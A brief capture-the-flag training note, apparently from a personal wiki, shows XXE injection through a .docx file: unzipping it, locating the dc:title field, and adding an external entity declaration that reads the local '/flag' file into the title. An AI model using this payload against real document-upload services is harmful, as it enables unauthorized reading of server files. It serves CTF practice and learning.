tags: [[CTF]] [[firebird training]] [[XXE]]
from herearrow-up-right, learn to read xml of a .docx file: unzip xxe.docx
unzip xxe.docx
grep -nr 'test1*' . -> dc:titlearrow-up-righttest1</dc:title>
grep -nr 'test1*' .
injection:
<!DOCTYPE replace [<!ENTITY injection SYSTEM "/flag"> ]>
replace to <dc:title>&injection;</dc:title>
<dc:title>&injection;</dc:title>
Last updated 3 years ago